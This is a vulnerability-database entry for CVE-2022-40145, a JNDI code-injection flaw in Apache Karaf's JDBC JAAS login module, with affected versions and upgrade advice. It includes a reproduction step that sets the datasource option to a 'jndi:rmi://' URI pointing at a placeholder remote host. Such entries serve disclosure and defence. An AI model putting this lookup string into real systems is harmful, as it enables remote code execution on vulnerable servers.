Lucene search

K
cvelistApacheCVELIST:CVE-2022-40145
HistoryDec 21, 2022 - 3:23 p.m.

CVE-2022-40145 Apache Karaf: JDBC JAAS LDAP injection

2022-12-2115:23:42
CWE-74
CWE-20
apache
www.cve.org
3
cve-2022-40145
apache karaf
jdbc
jaas
ldap injection
code injection
remote code execution
rce
jndi
upgrade

AI Score

10

Confidence

High

EPSS

0.001

Percentile

38.6%

This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL.

The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource
use InitialContext.lookup(jndiName) without filtering.
An user can modifyΒ options.put(JDBCUtils.DATASOURCE, "osgi:" +Β DataSource.class.getName()); to options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command"); in JdbcLoginModuleTest#setup.

This is vulnerable to a remote code execution (RCE) attack when a
configuration uses a JNDI LDAP data source URI when an attacker has
control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7.

We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8

CNA Affected

[
  {
    "defaultStatus": "unaffected",
    "product": "Apache Karaf",
    "vendor": "Apache Software Foundation",
    "versions": [
      {
        "lessThan": "4.4.2",
        "status": "affected",
        "version": "4.4.0",
        "versionType": "maven"
      },
      {
        "lessThan": "4.3.8",
        "status": "affected",
        "version": "0",
        "versionType": "maven"
      }
    ]
  }
]

AI Score

10

Confidence

High

EPSS

0.001

Percentile

38.6%

Related for CVELIST:CVE-2022-40145